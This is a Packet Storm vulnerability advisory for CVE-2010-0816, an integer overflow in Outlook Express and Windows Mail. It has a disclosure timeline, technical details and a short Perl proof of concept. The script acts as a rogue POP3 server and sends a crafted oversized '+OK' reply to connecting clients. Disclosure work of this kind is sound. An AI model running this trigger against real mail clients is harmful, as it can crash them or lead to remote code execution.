exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Windows Outlook Express And Windows Mail Integer Overflow

Microsoft Windows Outlook Express And Windows Mail Integer Overflow
Posted May 12, 2010
Authored by Francis Provencher

Microsoft Windows Outlook Express and Windows Mail suffer from an integer overflow vulnerability.

tags | exploit, overflow
systems | windows
advisories | CVE-2010-0816
SHA-256 | 2acf22676b2db8c146ec43270d2c5a5e9f0d7b238abc38f7dbe2d45a0204f152

Microsoft Windows Outlook Express And Windows Mail Integer Overflow

Change Mirror Download


#####################################################################################

Application: Microsoft Outlook Express
Microsoft Windows Mail

Platforms: Windows 2000
Windows XP
Windows Vista
Windows server 2003
Windows Server 2008 SR2

Exploitation: Remote Exploitable

CVE Number: CVE-2010-0816

Discover Date: 2009-09-11

Author: Francis Provencher (Protek Research Lab's)

Website: http://www.protekresearchlab.com


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code


#####################################################################################

=================
1) Introduction
=================

Windows Mail is an e-mail and newsgroup client included in Windows Vista, that was superseded by Windows Live Mail.

It is the successor to Outlook Express. Microsoft previewed Windows Mail on Channel 9 on October 10, 2005.[1]

Unlike Outlook Express, Windows Mail is not considered to be a component of Internet Explorer. As such, it will not

be made available for earlier Windows operating systems, while Windows Internet Explorer 7 was made available for

Windows XP.

Windows Mail has been succeeded by Windows Live Mail, which was built by the same development team as Windows Mail

and also serves as the replacement for Outlook Express for Windows XP.

(Wikipedia)
#####################################################################################

====================
2) Report Timeline
====================

2009-11-09 Vendor Contacted
2009-11-09 Vendor Response
2009-11-16 Vendor request a PoC
2009-11-16 PoC is send
2009-11-19 Vendor confirme they received PoC
2009-11-24 Vendor confirm the vulnerability
2010-05-11 Public release of this advisory

#####################################################################################

======================
3) Technical details
======================

An unauthenticated remote code execution vulnerability exists in the way that the Windows Mail Client software

handles specially crafted mail responses. An attempt to exploit the vulnerability would not require authentication,

allowing an attacker to exploit the vulnerability by sending a specially crafted response to a client initiating a

connection to a server under his control using the common mail protocols.


The vulnerability is caused by a common library used by Outlook Express and Windows Mail insufficiently validating

network data before using that data to calculate the necessary size of a buffer.



#####################################################################################

=====================
4) Product affected
=====================

Mail client; Microsoft Outlook Express & Microsoft Windows Mail
Plateforms; Vista SP1 & Windows Server 2008 SP1

#####################################################################################

=============
5) The Code
=============


#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Microsoft Windows Mail CLient & outlook express Remote Integer Overflow
#



use IO::Socket;

$port = 110;

$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>$port,
Listen=>1)
or die "Error: listen($port)\n";

$cli = $serv->accept() or die "Error: accept()\n";


$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 357913944 100\r\n");




#####################################################################################

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close